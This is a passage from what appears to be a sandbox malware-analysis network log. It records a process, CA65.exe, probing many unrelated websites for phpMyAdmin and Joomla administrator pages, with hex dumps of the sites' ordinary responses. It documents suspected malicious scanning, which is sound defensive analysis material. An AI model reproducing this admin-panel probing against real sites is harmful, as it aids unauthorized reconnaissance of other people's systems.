6e 74 33 32 41 72 72 61 79 28 65 2e 67 Data Ascii: ){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.g
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 Data Ascii: ,"emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"nu
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 64 5f 70 6c 75 67 69 6e 5f 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 66 72 65 73 68 64 65 73 6b 2d 73 75 70 70 6f 72 74 2f 70 75 62 6c 69 63 2f 63 73 73 2f 66 72 65 73 68 64 65 73 6b 5f 70 6c 75 67 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 Data Ascii: moji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><link rel='stylesheet' id='fd_plugin_css-css' href='https://theproducebox.com/wp-content/plugins/freshdesk-support/public/css/freshdesk_plugin.css?ver=6.4.2' media='a
2023-12-22 20:14:55 UTC	1355	IN	Data Raw: 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d Data Ascii: oration:none}</style><style id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 32 30 30 30 0d 0a 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 Data Ascii: 2000209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-g
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 63 72 69 73 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 Data Ascii: ow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: lef
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d Data Ascii: ayout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--
2023-12-22 20:14:55 UTC	1369	IN	Data Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 Data Ascii: ckground-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	59700	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	178	OUT	GET /phpmyadmin/ HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	577	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:14:55 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 94 Connection: close X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fL%2Bb%2FQbr6XU2W2tEwXoxd9xz1wgIZXbqv34ZYhb5xpWi%2BYBLi8EV1QrnT%2FNOHmjxDSKgTqQMoPTpHudkhjphcGkM14ek4KBykC8lelxjjfcw2zFkkkDTAjyuKtvgjiUx6psY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08ac6db831e9-MIA
2023-12-22 20:14:55 UTC	94	IN	Data Raw: 46 6f 72 20 73 65 63 75 72 69 74 79 20 72 65 61 73 6f 6e 73 2c 20 74 68 69 73 20 55 52 4c 20 69 73 20 6f 6e 6c 79 20 61 63 63 65 73 73 69 62 6c 65 20 75 73 69 6e 67 20 6c 6f 63 61 6c 68 6f 73 74 20 28 31 32 37 2e 30 2e 30 2e 31 29 20 61 73 20 74 68 65 20 68 6f 73 74 6e 61 6d 65 2e Data Ascii: For security reasons, this URL is only accessible using localhost (127.0.0.1) as the hostname.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	59596	192.178.50.46	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	184	OUT	GET /site/mcammondlife/ HTTP/1.1 Host: sites.google.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	1149	IN	HTTP/1.1 302 Found Content-Type: application/binary X-Frame-Options: DENY Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site Location: https://accounts.google.com/ServiceLogin?passive=1209600&osid=1&continue=https://sites.google.com/site/mcammondlife/&followup=https://sites.google.com/site/mcammondlife/ P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy: unsafe-none Content-Security-Policy: base-uri 'self';object-src 'none';report-uri /_/view/cspreport;script-src 'unsafe-inline' 'unsafe-eval' https: http:;worker-src 'self';frame-ancestors https://google-admin.corp.google.com/ Cross-Origin-Resource-Policy: same-site Date: Fri, 22 Dec 2023 20:14:55 GMT Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Content-Type-Options: nosniff Set-Cookie: NID=511=frerl_iV3Uscy8yMPwKDkSyUWh8nmmBW6NIWqkU0Si__zoppyZuB0VaqlgoniYDYJdvaGVvvP0q9BJVlVn8SwZR8gdaHUPEm4hqHn4EhMV4pE1tLd-3gw06qdaE3xBUXkN_EZM4KqvT8zWqn7qATuodWjNvmrkZCAOXDbt7jXhE; expires=Sat, 22-Jun-2024 20:14:55 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	59801	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	187	OUT	GET /administrator/index.php HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	643	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:55 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: https://www.thenile.com.au/administrator/index.php via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0PQax5Pc3noAzHfbs1oLlMhWwrwIkWM5djkauYJ4agRDltBSMb19JOlluq%2BWU45McKBz4%2B5Saz%2FbolZl%2Bc5tNX%2FSUcbkPYefsm7ZCcDB38AT3yUaw9x6HD2zw%2Ba2XR6F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08ad6dc88df4-MIA
2023-12-22 20:14:55 UTC	265	IN	Data Raw: 31 30 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e Data Ascii: 102<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/administrator/index.php">here</a>.</p></body>
2023-12-22 20:14:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	59827	13.35.116.12	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	174	OUT	GET /phpmyadmin HTTP/1.1 Host: www.wika.co.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:56 UTC	1149	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Content-Length: 180 Connection: close Date: Fri, 22 Dec 2023 20:14:53 GMT Server: web Location: https://www.wika.com/en-in/phpmyadmin X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/) X-ManagedFusion-Rewriter-Version: 3.7 X-UA-Compatible: IE=edge strict-transport-security: max-age=31536000; includeSubDomains; Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: ; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XXS-Protection: 1; mode=block X-Powered-By: ARR/3.0 X-Cache: Miss from cloudfront Via: 1.1 20f0da216a3d7d69d6c7e3cec1f1788e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-C2 X-Amz-Cf-Id: l6HyOmvOsXWMoOXg-l637yIkj3d0YeKNTjqJgrKhz_-WewPdClJoew==
2023-12-22 20:14:56 UTC	180	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 55 52 49 20 74 68 61 74 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 69 6b 61 2e 63 6f 6d 2f 65 6e 2d 69 6e 2f 70 68 70 6d 79 61 64 6d 69 6e 22 3e 6d 6f 76 65 64 20 74 6f 20 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Moved Permanently</title></head><body><p>The URI that you requested has been <a href="https://www.wika.com/en-in/phpmyadmin">moved to here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	59707	167.235.0.29	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:55 UTC	197	OUT	GET /administrator/index.php HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:55 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 34 3a 35 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:14:55 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
2023-12-22 20:14:55 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http
2023-12-22 20:14:56 UTC	16384	IN	Data Raw: 69 6f 6e 2d 63 69 72 63 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 22 2c 22 65 78 70 61 6e 64 22 3a 22 66 61 73 20 66 61 2d 65 78 70 61 6e 64 22 2c 22 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 3a 22 66 61 73 20 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 2c 22 65 79 65 22 3a 22 66 61 73 20 66 61 2d 65 79 65 22 2c 22 65 79 65 2d 73 6c 61 73 68 22 3a 22 66 61 73 20 66 61 2d 65 79 65 2d 73 6c 61 73 68 22 2c 22 66 61 63 65 2d 67 72 69 6e 22 3a 22 66 61 73 20 66 61 2d 67 72 69 6e 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 66 61 62 Data Ascii: ion-circle","exclamation-triangle":"fas fa-exclamation-triangle","exclamation":"fas fa-exclamation","expand":"fas fa-expand","external-link":"fas fa-external-link","eye":"fas fa-eye","eye-slash":"fas fa-eye-slash","face-grin":"fas fa-grin","facebook":"fab
2023-12-22 20:14:56 UTC	16384	IN	Data Raw: 6f 73 73 68 61 69 72 73 22 3a 22 66 61 6c 20 66 61 2d 63 72 6f 73 73 68 61 69 72 73 22 2c 22 63 73 73 33 22 3a 22 66 61 62 20 66 61 2d 63 73 73 33 22 2c 22 63 75 62 65 73 22 3a 22 66 61 73 20 66 61 2d 63 75 62 65 73 22 2c 22 64 65 6c 69 63 69 6f 75 73 22 3a 22 66 61 62 20 66 61 2d 64 65 6c 69 63 69 6f 75 73 22 2c 22 64 65 73 6b 74 6f 70 22 3a 22 66 61 73 20 66 61 2d 64 65 73 6b 74 6f 70 22 2c 22 64 65 76 69 61 6e 74 61 72 74 22 3a 22 66 61 62 20 66 61 2d 64 65 76 69 61 6e 74 61 72 74 22 2c 22 64 6f 74 2d 63 69 72 63 6c 65 22 3a 22 66 61 72 20 66 61 2d 64 6f 74 2d 63 69 72 63 6c 65 22 2c 22 64 6f 77 6e 6c 6f 61 64 22 3a 22 66 61 73 20 66 61 2d 64 6f 77 6e 6c 6f 61 64 22 2c 22 64 72 69 62 62 62 6c 65 22 3a 22 66 61 62 20 66 61 2d 64 72 69 62 62 62 6c 65 22 Data Ascii: osshairs":"fal fa-crosshairs","css3":"fab fa-css3","cubes":"fas fa-cubes","delicious":"fab fa-delicious","desktop":"fas fa-desktop","deviantart":"fab fa-deviantart","dot-circle":"far fa-dot-circle","download":"fas fa-download","dribbble":"fab fa-dribbble"
2023-12-22 20:14:56 UTC	16384	IN	Data Raw: 22 20 64 61 74 61 2d 6c 65 76 65 6c 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 64 61 74 61 2d 63 6f 6c 6c 61 70 73 65 3d 22 66 61 2d 63 61 72 65 74 2d 72 69 67 68 74 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 20 64 61 74 61 2d 73 75 63 63 65 73 73 3d 22 66 61 2d 63 61 72 65 74 2d 64 6f 77 6e 20 64 65 66 61 75 6c 74 2d 66 61 73 69 7a 65 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 75 6c 20 Data Ascii: " data-level="0"> <i class="fas fa-caret-right default-fasize" aria-hidden="true" data-collapse="fa-caret-right default-fasize" data-success="fa-caret-down default-fasize"></i> </a></div><ul
2023-12-22 20:14:56 UTC	12337	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 74 65 78 74 27 20 69 64 3d 22 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 73 2d 74 65 78 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 61 76 69 73 6f 2d 63 6f 6f 6b 69 65 2d 62 75 74 74 6f 6e 73 27 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 Data Ascii: justify-content: flex-end; margin-top: 2em; margin-bottom: 1em; } </style> <div id="aviso-cookies"> <div class='aviso-cookie-text' id="aviso-cookies-text"> </div> <div class='aviso-cookie-buttons'> <a href="https://w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	59962	209.124.80.122	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
